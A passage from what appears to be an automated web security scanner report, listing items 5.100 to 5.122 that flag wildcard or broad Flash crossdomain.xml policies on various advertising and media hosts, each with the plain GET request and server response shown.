Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/xml;charset=UTF-8
Content-Length: 82
Date: Sat, 17 Sep 2011 00:57:54 GMT
Connection: close

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

5.100. http://rt1903.infolinks.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rt1903.infolinks.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: rt1903.infolinks.com
Proxy-Connection: keep-alive
Referer: http://resources.infolinks.com/flash/ic4.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cuid=8d0d791e-8b09-4efc-b8c1-f2d069d5fcec; cnoi=4

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/xml;charset=UTF-8
Content-Length: 82
Date: Sat, 17 Sep 2011 01:01:40 GMT
Connection: close

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

5.101. http://s0.2mdn.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Fri, 16 Sep 2011 02:43:00 GMT
Expires: Sat, 17 Sep 2011 02:43:00 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 79661

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

5.102. http://sana.newsinc.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sana.newsinc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: sana.newsinc.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "9a2df4412dfbe178fccafc4915ad186e:1307641379"
Last-Modified: Thu, 09 Jun 2011 17:42:59 GMT
Accept-Ranges: bytes
Content-Length: 335
Content-Type: application/xml
Date: Sat, 17 Sep 2011 01:09:39 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-polici
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

5.103. http://segment-pixel.invitemedia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: segment-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Sat, 17 Sep 2011 01:38:56 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

5.104. http://sensor2.suitesmart.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sensor2.suitesmart.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: sensor2.suitesmart.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:52:46 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 18 Feb 2011 18:15:01 GMT
ETag: "1f00e1-c9-49c927e105340"
Accept-Ranges: bytes
Content-Length: 201
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

5.105. http://servedby.flashtalking.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: servedby.flashtalking.com

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 17:29:46 GMT
Server: Jetty(6.1.22)
Cache-Control: max-age=86400
Content-Type: application/xml
Age: 26536
Via: 1.0 mdw061003 (MII-APC/2.1)
x-mii-cache-hit: 1
Content-Length: 540
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

5.106. http://spe.atdmt.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://spe.atdmt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: spe.atdmt.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Content-Length: 207
Allow: GET
Expires: Thu, 22 Sep 2011 14:59:34 GMT
Date: Sat, 17 Sep 2011 00:54:32 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

5.107. http://static.scanscout.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.scanscout.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: static.scanscout.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.8 (Unix)
Last-Modified: Fri, 17 Jul 2009 15:17:30 GMT
ETag: "11ecc34-112-46ee8496a1680"
Content-Type: application/xml
Cache-Control: max-age=7200
Date: Sat, 17 Sep 2011 01:47:32 GMT
Content-Length: 274
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
<site-
...[SNIP]...

5.108. http://stats.kaltura.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://stats.kaltura.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: stats.kaltura.com
Proxy-Connection: keep-alive
Referer: http://www.kaltura.com/index.php/kwidget/cache_st/1316195504/wid/_591531/uiconf_id/4899061/entry_id/1_6mbkzzuu
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Thu, 11 Aug 2011 11:14:14 GMT
X-Me: ny-apache3
X-UA-Compatible: IE=EmulateIE7
Content-Length: 392
Content-Type: text/xml
Cache-Control: public, max-age=7776000
Expires: Fri, 16 Dec 2011 00:52:11 GMT
Date: Sat, 17 Sep 2011 00:52:11 GMT
Connection: close
Vary: Accept-Encoding

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
   <allow-access-from domain="*" to-ports="*" secure="false"/>
...[SNIP]...

5.109. http://t.mookie1.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://t.mookie1.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: t.mookie1.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:58:34 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Tue, 06 Sep 2011 16:07:59 GMT
ETag: "5d2402e-c9-4ac480804d5c0"
Accept-Ranges: bytes
Content-Length: 201
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

5.110. http://tags.bluekai.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: tags.bluekai.com

Response

HTTP/1.0 200 OK
Date: Sat, 17 Sep 2011 01:30:44 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 29 Jun 2011 21:44:06 GMT
ETag: "3e603d4-ca-4a6e0af03f580"
Accept-Ranges: bytes
Content-Length: 202
Content-Type: text/xml
Connection: close

<cross-domain-policy>
<allow-access-from domain="*" to-ports="*"/>
<site-control permitted-cross-domain-policies="all"/>
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy
...[SNIP]...

5.111. http://thumbnails.infolinks.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://thumbnails.infolinks.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: thumbnails.infolinks.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=14400
Content-Type: text/xml
Date: Sat, 17 Sep 2011 00:59:56 GMT
ETag: "870df3-52-493eb32c1c540"
Expires: Sat, 17 Sep 2011 04:59:56 GMT
Last-Modified: Sun, 31 Oct 2010 15:18:05 GMT
Server: ECS (sjo/5227)
X-Cache: HIT
Content-Length: 82
Connection: close

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

5.112. http://traffic.outbrain.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://traffic.outbrain.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: traffic.outbrain.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"201-1311068652000"
Last-Modified: Tue, 19 Jul 2011 09:44:12 GMT
Content-Type: application/xml
Content-Length: 201
Date: Sat, 17 Sep 2011 01:00:14 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

5.113. http://trk.vindicosuite.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://trk.vindicosuite.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=245a9d68-6452-49a8-98f4-7fb38d8d1b33; vpp=245a9d68-6452-49a8-98f4-7fb38d8d1b33

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/xml
Date: Sat, 17 Sep 2011 01:05:42 GMT
ETag: "3bab9858bc52cc1:0"
Last-Modified: Thu, 04 Aug 2011 15:36:58 GMT
Server: Microsoft-IIS/7.5
Vary: Accept-Encoding
X-VINDICO-Instance: i-e9977187
Content-Length: 297
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-http-request-headers-from domain="*" headers="*"
...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...

5.114. http://u-ads.adap.tv/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://u-ads.adap.tv
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: u-ads.adap.tv
Proxy-Connection: keep-alive
Referer: http://adunit.cdn.auditude.com/flash/modules/display/AuditudeDisplayView.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: unique_ad_source_impression="20718%2C20716__TIME__2011-09-14+05%3A39%3A11"; asptvw1="as-2%2C1%2C2011-09-14%2F08-14-57"; adsrcvw1="27169%2C1%2C2011-09-15%2F07-14-57+c17252%2C1%2C2011-09-21%2F07-14-57+c17667%2C1%2C2011-09-15%2F05-45-56+27168%2C1%2C2011-09-15%2F05-39-11+c17253%2C1%2C2011-09-21%2F05-39-11"; creativeViews="{\"v\":1,\"views\":[{\"id\":9866,\"ts\":1316003951,\"cts\":null},{\"id\":9699,\"ts\":1316009697,\"cts\":null}]}"; audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]},\"20\":{\"f\":1317625200,\"e\":1317625200,\"s\":[],\"a\":[]},\"24\":{\"f\":1318575600,\"e\":1318575600,\"s\":[],\"a\":[]},\"2\":{\"f\":1318575600,\"e\":1318575600,\"s\":[],\"a\":[]},\"21\":{\"f\":1318575600,\"e\":1318575600,\"s\":[],\"a\":[]},\"27\":{\"f\":1318575600,\"e\":1323759600,\"s\":[],\"a\":[]}}}"; rtbData0="key=adnetik:value=f9bdca69-e609-4297-9145-48ea56a0756c:expiresAt=Wed+Nov+02+17%3A44%3A53+PDT+2011:32-Compatible=true,key=turn:value=2944787775510337379:expiresAt=Wed+Sep+21+05%3A39%3A13+PDT+2011:32-Compatible=true,key=tidaltv:value=0fc5bd89-5ab4-4635-8ff8-18b58e6e3f77:expiresAt=Sun+Nov+13+06%3A14%3A58+PDT+2011:32-Compatible=true,key=dataxu:value=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F:expiresAt=Sun+Nov+13+06%3A15%3A00+PST+2011:32-Compatible=true"; adaptv_unique_user_cookie="8003939466491013594__TIME__2011-09-16+18%3A00%3A32"; marketTransaction="true__TIME__2011-09-14+05%3A39%3A04"; adaptv_page_url=oOt0lqLFswM_

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Content-Type: text/xml
Connection: Keep-Alive
Content-Length: 194

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>

5.115. http://vads.adbrite.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vads.adbrite.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: vads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://adunit.cdn.auditude.com/flash/modules/display/AuditudeDisplayView.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168296542x0.096+1314892454x-365710891"; untarget=1; b="%3A%3A13beg"; geo="1%3AJY5LDoIwEEDv0q2ftPQ77IwXMEEPgOUTEwEDVQOEuzszbl5eX9tpV%2FFRIl%2FF8niJXIBVUu2ImumY4YBUXJQl19w1dw3khm%2BZQLSSuuPiDNFLZkbd8xzgM8C74MRepAWfvxRX1Gro0KehSc9yrsdjxDXWrsQapEfvv2mm76LG4Y1yK6jW6d%2FGtkc5n1CnR4sqwcfgG7hLaKLX1sVQZSBdU1daW6PFtv0A"; vsd=0@2@4e73f12f@widget.newsinc.com

Response

HTTP/1.1 200 OK
Content-Type: text/x-cross-domain-policy
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Sat, 17 Sep 2011 01:01:05 GMT
Content-Length: 195

<?xml version="1.0" encoding="UTF-8"?>
<!-- AdBrite crossdomain.xml for VAST video and beacons -->
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>

5.116. http://vast.bp3845889.btrll.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vast.bp3845889.btrll.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: vast.bp3845889.btrll.com

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: application/xml
Cache-Control: max-age=7776000

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

5.117. http://w88.go.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://w88.go.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: w88.go.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:02:53 GMT
Server: Omniture DC/2.0.0
xserver: www384
Content-Length: 137
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

5.118. http://wls.wireless.att.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wls.wireless.att.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: wls.wireless.att.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 07 Oct 2010 01:40:52 GMT
Accept-Ranges: bytes
ETag: "02af4acc065cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:40:02 GMT
Connection: close
Content-Length: 82

<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

5.119. http://www.kaltura.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kaltura.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: www.kaltura.com
Proxy-Connection: keep-alive
Referer: http://www.kaltura.com/index.php/kwidget/cache_st/1316195504/wid/_591531/uiconf_id/4899061/entry_id/1_6mbkzzuu
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Date: Sat, 17 Sep 2011 00:52:05 GMT
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:33:10 GMT
Cache-Control: max-age=7776000, public
Expires: Fri, 16 Dec 2011 00:52:05 GMT
X-Me: pa-apache2
X-UA-Compatible: IE=EmulateIE7
Content-Length: 392
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
   <allow-access-from domain="*" to-ports="*" secure="false"/>
...[SNIP]...

5.120. http://a.abc.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://a.abc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: a.abc.com

Response

HTTP/1.0 200 OK
Content-Length: 982
Content-Type: text/xml
Last-Modified: Fri, 15 Jul 2011 20:57:19 GMT
Accept-Ranges: bytes
ETag: "80e1e7c83143cc1:5763"
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abcmed06
X-Powered-By: ASP.NET
Cache-Expires: Fri, 15 Jul 2011 21:05:37 GMT
X-UA-Compatible: IE=EmulateIE7
Cache-Control: max-age=207
Date: Sat, 17 Sep 2011 01:02:02 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.abc.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.abcfamily.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.dig.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.disney.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.go.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.hulu.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.starwave.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.innovid.com" secure="false" />
...[SNIP]...
<allow-access-from domain="afv.dev.dave.tv" secure="false" />
...[SNIP]...
<allow-access-from domain="cdn.media.soapnet.com" secure="false" />
...[SNIP]...
<allow-access-from domain="soapnet.com" secure="false" />
...[SNIP]...
<allow-access-from domain="wdig.vo.llnwd.net" secure="false" />
...[SNIP]...
<allow-access-from domain="widgets.clearspring.com" secure="false" />
...[SNIP]...

5.121. http://abc.go.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://abc.go.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: abc.go.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Connection: close
Date: Sat, 17 Sep 2011 01:02:00 GMT
Content-Type: text/xml
Last-Modified: Fri, 15 Jul 2011 20:57:19 GMT
Accept-Ranges: bytes
ETag: "80e1e7c83143cc1:5caa"
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abc08
X-Powered-By: ASP.NET
Cache-Expires: Sat, 17 Sep 2011 01:04:51 GMT
Content-Length: 982

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.abc.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.abcfamily.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.dig.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.disney.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.go.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.hulu.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.starwave.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.innovid.com" secure="false" />
...[SNIP]...
<allow-access-from domain="afv.dev.dave.tv" secure="false" />
...[SNIP]...
<allow-access-from domain="cdn.media.soapnet.com" secure="false" />
...[SNIP]...
<allow-access-from domain="soapnet.com" secure="false" />
...[SNIP]...
<allow-access-from domain="wdig.vo.llnwd.net" secure="false" />
...[SNIP]...
<allow-access-from domain="widgets.clearspring.com" secure="false" />
...[SNIP]...

5.122. http://adimages.go.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://adimages.go.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.1
Host: adimages.go.com
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
